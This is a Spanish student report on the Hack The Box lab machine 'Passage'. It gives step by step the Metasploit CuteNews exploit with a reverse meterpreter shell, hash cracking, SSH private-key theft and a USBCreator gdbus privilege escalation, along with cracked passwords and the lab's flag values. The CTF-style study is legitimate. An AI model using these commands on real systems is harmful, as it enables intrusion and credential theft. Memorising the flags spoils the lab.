Logo Studenta

informe passage (2)

¡Este material tiene más páginas!

Vista previa del material en texto

Contenido
1.	Tabla de control de documentos	2
2.	Resumen	2
3.	Metodología	2
4.	Informe de evaluación	2
5.	Resultados obtenidos	9
6.	Conclusión y recomendación	10
7.	Apéndice	10
	
1. Tabla de control de documentos
	AUTORES
	FECHA DE ENTREGA
	PÁGINAS
	VERSIÓN
	ESTADO
	Alexander Chele Alvia, Carlos Orrala Tomalá y Cesar Orrala Ramírez
	30/09/2020
	4
	1,0
	Metodologías de Escaneos 
	Alexander Chele Alvia, Carlos Orrala Tomalá y Cesar Orrala Ramírez
	10/10/2020
	9
	1.1
	Escaneos de Hack the box: Passagge.
	Alexander Chele Alvia, Carlos Orrala Tomalá y Cesar Orrala Ramírez
	13/10/2020
	21
	1.2
	Resultado Final: Procedimiento y Solución 
2. Resumen
	Descripción del proyecto
La partica que realzaremos será en la paginas oficial de Hack the box la cual escogeremos una máquina para obtener los archivos user.txt y root.txt con la ayuda del sistema operativo Kali Linux esto será en un habiente virtual también utilizaremos Nmap y Metasloit framework para tener acceso a nuestra maquina ya previamente seleccionada con los cuales detallamos todos los puntos importante en este informe.
Metas
· Reconocimiento de la plataforma o maquina ya seleccionada, se le realizar el ingreso por su dirección ip para realizar un escaneo y obtener información.
· Escaneo y búsqueda de los puertos abiertos en las cuales utilizaremos el comando nmap para obtener exploit y poder acceder a las maquinas. 
· Obtener acceso con la ejecución de los exploit encontrados y sus respectivos payload los cuales nos permitirán obtener las credenciales de los archivos user.txt y root.txt. 
	Encontrar recuentos
Hallazgos totales
Obtuvimos 2 hallazgos importante que son los usuarios.txt y root.txt los cueles nos permitió tener acceso
Alcance
g0tmi1k, «Kali Linux - Documentation,» 25 11 2019. [En línea]. Available: https://www.kali.org/docs/introduction.
fechas
Patada inicial
Prueba activa
13/10/2020
Entrega de informes
3. Metodología
Mediante una evaluación previa a nuestro objetivo Hack The Box controlada y que contiene máquinas virtuales que permite obtener con facilidad la dirección ip dando así una facilidad de escanear y obtener los puertos para posterior penetrar y obtener informaciones relevantes.
Debido a la información proporcionada anterior evaluamos y decidimos por una aplicación que nos ayuda a obtener información de la misma como es Nmap una herramienta que nos permite navegar redes más aun para obtener host simple a través de paquetes IP; obteniendo información de una red disponible, servicios que utiliza con su versión en el momento, bajo qué sistema operativo esta creado y corre, firewall utilizado por la misma.
Posterior a una conexión vpn para administrarlo desde consola de sistema operativo de Kali y evaluación oportuna de cada uno de pasos importantes para obtener lo requerido; uno de ellos es detectar los puertos abiertos e identificar si existen usuarios por defecto. Con la información de este paso se realizó la búsqueda de los exploit para acceder a las maquinas; mediante la ejecución de los exploit con los respectivos payload se procedió al ingreso en las maquinas objetivos para poder descubrir las credenciales de los archivos user.txt y root.txt.
4. Informe de evaluación
En el siguiente informe se detalladle los hallazgos durante la penetración hacia la maquina Passage de la plataforma HACK THE BOX. La maquina Passage es un servidor web con sistema operativo Linux el cual cuenta con un sitio web de noticias el cual usa programas como:
· Fail2Ban: Es un software escrito en python para prevenir accesos no deseados instalados en servidores linux, luego de x intentos bloquea la ip. Evita que se estén validando y probando diferentes contraseñas para acceder al servidor bloqueando la conexión por medio de ssh.
Problemas identificados
Se encontró varias vulnerabilidades dentro del servidor tanto de aplicaciones exteriores y visible para cualquier usuario, así también aplicaciones por defecto del sistema operativo internas del servidor.
1. Vulnerabilidad en la aplicación CuteNews del sitio web de Passage Medio
CuteNews: Es un gestor de noticias para páginas web o blog gratuito basados en archivos de texto plano, desarrollado por CutePHP.
Detalle: 
Conexión a la maquina mediante VPN, para permitir realizar el escaneo de los puertos del servidor mediante la herramienta nmap y la siguiente línea de comando:
root@kali:~/Escritorio/Passage# nmap -sV -O -sC -A -oN Dyplesher.txt 10.10.10.206
Después de realizar el escaneo se identificó el puerto 22 abierto para conexión remota mediante ssh.
Luego se realizo el registro dentro del sitio web del servidor con las siguientes credenciales.
Usuario: Alexander
Contraseña: AlexC40S
Se identifico que ocupaba CuteNews 2.1.2 el cual es una versión vulnerable a posibles ataques, utilizando la herramienta Metasploit se encontró el exploit para esta versión de CuteNews.
Ilustración 1 Búsqueda de vulnerabilidad
Se modifico el exploit debido a que contenía error en la línea de Refeneces se editó los siguientes parámetros del código:
'References' => [ ['URL', 'http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html'], ['URL', 'http://cutephp.com'] # Official Website ],
Ilustración 2Edición de código del exploit
Luego se procedió a mover el archivo dentro del directorio onde están los exploit de Metasploit utilizando el siguiente comando:
root@kali:~# mv 46698.rb /usr/share/metasploit-framework/modules/exploits/multi/http
Una vez movido el exploi se procedió a la búsqueda y el uso del exploit con los siguientes comandos
msf5 > search 46698
msf5 > use 0
msf5 exploit(multi/46698) > show options
Para el uso del exploit se utilizaron los siguientes parámetros:
IP del atacante: 10.10.15.32
IP del objetivo: 10.10.10.206
Las credenciales de usuario y contraseña son del registro previo en la página.
Usuario: Alexander
Contraseña: AlexC40S
Ejecutar el exploit con el comando run
Ilustración 3 Seteo de parámetro para usar el exploit
Ejecución del comando:
meterpreter > shell
Para poder establecer la conexión a la maquina víctima. Para poder mantener la conexión se ejecuta el siguiente comando:
python -c "import pty;pty.spawn('/bin/bash')"
Ilustración 4 Establecer conexión con la victima
Debido a que este usuario no tenía acceso al archivo users.txt revisamos un archivo llamado lines con el comando cat lines, en el cual existen datos en base 64. Una vez identificado estos archivos se procedió a descifrarlos usando el comando:
root@kali:~/Escritorio/Passage# echo CodigoDentroDeLine | base64 -d
Para usar este comando se remplazó la palabra CodigoDentroDeLine y pegar el código del archivo line dentro. Realizando cada descifrado de código se encontraron solo 2 usuarios con una terminación de @passage.htb
Ilustración 5 Descifrado de códigos del archivo lines
Luego de ejecutar el comando se encontró la siguiente información con el usuario y la clave cifrada.
a:1:{s:4:"name";a:1:{s:10:"paul-coles";a:9:{s:2:"id";s:10:"1592483236";s:4:"name";s:10:"paul-coles";s:3:"acl";s:1:"2";s:5:"email";s:16:"paul@passage.htb";s:4:"nick";s:10:"Paul Coles";s:4:"pass";s:64:"e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd";s:3:"lts";s:10:"1592485556";s:3:"ban";s:1:"0";s:3:"cnt";s:1:"2";}}}
Para descifrar este código se usó la página https://crackstation.net/
Solo se pudo descifrar la contraseña del usuario Paul.
Información encontrada:
Usuario: paul@passage.htb
Has: e26f3e86d1f8108120723ebe690e5d3d61628f4130076ec6cb43f16f497273cd
Contraseña: atlanta1
Usuario: nadav@passage.htb
Has: 7144a8b531c27a60b51d81ae16be3a81cef722e11b43a26fde0ca97f9e1485e1
Contraseña: 
Dirigirse al directorio cdata/users onde se encuentran los usuarios para ingresar como Paul se ejecuta el siguiente comando y se escribe la contraseña
www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul
Password: atlanta1
Una vez dentro como el usuario dirigirse al directorio ~/.ssh donde se realiza larecopilación de las claves ssh privada de Paul para el ingreso desde la maquina atacante
Listamos los archivos con ls y con cat vemos lo que existe dentro de id_rsa copiar lo que esta dentro del archivo.
paul@passage:/var/www/html/CuteNews/cdata/users$ cd ~/.ssh
paul@passage:~/.ssh$ ls
paul@passage:~/.ssh$ cat id_rsa
Ilustración 6 Código ssh para el acceso del usuario paul
Debido a la gran cantidad de archivos en el directorio de paul se aplicó el comando cat. */* para ver los archivos
paul@passage:~$ cat. */*
Ilustración 7 Identificación del usuario nadav
Encontramos al usuario nadav dentro del directorio de paul. Esto puede decir que existe algún vínculo entre el usuario Paul y Nadav asique se procede a usar la misma clave de paul.
paul@passage:~$ ssh nadav@10.10.10.206
 
2. Vulnerabilidad en la aplicación Startup Disk Creator dentro del servidor Passage 											Alto
Detalle:
Luego de acceder como el usuario nadav se procedió a listar los procesos de ejecución con el comando:
nadav@passage:~$ ps aux
Se encontró el siguiente programa ejecutado con privilegio root
Ilustración 8 Proceso ejecutándose en el usuario root
Es utilizado por el programa Startup Disk Creator para crear Live Usb integrado en ubuntu en todas las versiones posteriores a Ubuntu 8.0.4
Sobre esta herramienta existe una vulnerabilidad que permite la escalabilidad de privilegio.
El USBCreator utiliza Python para escribir en el disco, si realizar comprobación de en qué archivo se está escribiendo, ni solicita contraseña a los usuarios que pertenecen al grupo sudo, debido a esta vulnerabilidad podemos acceder al usuario root. Para obtener el id_rsa del usuario root desde el directorio raíz en la carpeta tmp.
Ejecutamos el siguiente comando:
nadav@passage:/tmp$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /root/.ssh/id_rsa /tmp/pwn true
Se crea un archivo con el nombre pwn en el cual se guarda la credencial del usuario root, con un cat vemos lo que está dentro del archivo y lo copiamos en otro archivo para acceder mediante ssh al usuario root.
Ilustración 9 Credenciales ssh del usuario root
Creamos un archivo con la contraseña de root
root@kali:~/Escritorio/Passage# touch root
root@kali:~/Escritorio/Passage# nano root
Luego accedemos desde este directorio donde esta guardada la clave del root.
root@kali:~/Escritorio/Passage# ssh -i root root@10.10.10.206
root@passage:~# ls
root@passage:~# cat root.txt
Listamos y abrimos el archivo root.txt
Ilustración 10 Código del archivo roott.txt
Contraseña del archivo root.txt
f304c0fcf7fccecad9d87e8bf85b74c6
Dentro de root nos diriguimos al directorio home para ver el archivo user.txt que se encontraba dentro del usuario paul.
Comandos
root@passage:~# cd home
root@passage:~# cd paul/
root@passage:/home/paul# cat user.txt
	
Ilustración 11 Código del archivo user.txt
Contraseña del archivo user.txt
9c075122cbcb34db7730fad6be18fc1a
5. Resultados obtenidos
“El conocimiento no es una vasija que se llena, sino un fuego que se enciende”. Plutarco
Luego de los procesos y métodos detallados que se realizaron se obtuvo la clave para poder acceder a uno de los servidores que tiene; navegamos en la paginas de hack the box y posterior se obtuvo el objetivo:
 Digitamos cualquier clave
Al no digitar la clave correcta nos dio un mensaje de error, debemos digitar precisamente la clave obtenido:
 Objetivo logrado
6. Conclusión y recomendación
Entendimos que es un poco complejo al momento de realizar esta práctica la cual nos fortaleció nuestro conocimiento respectivo para obtener un usuario y root de las máquinas, para tener una mejor enseñanza apropiada debería el docente poner más en práctica durante las clases.
7. Apéndice
APÉNDICE A - CLASIFICACIÓN DE CRITERIOS 
A continuación se muestran los criterios de calificación de riesgo utilizados para clasificar este informe:
	Gravedad
	Descripción
	CRÍTICO
	Permitir la escalabilidad de privilegio en la cual nos permitirá acceder a usuario root para obtener el id_rsa del usuario root en donde encontraremos nuestra contraseña
	ALTO
	Búsqueda de una clave cifrada la cual nos ayudara a obtener nuestro usuario una vez ya descifrada.
	MEDIO
	Obtener los puertos que se utilizan en la máquina y su exploit adecuado a utilizar para así poder tener acceso.
	BAJO
	Búsqueda de información con la ip de la máquina para tener una mayor un mayor entendimiento.

Continuar navegando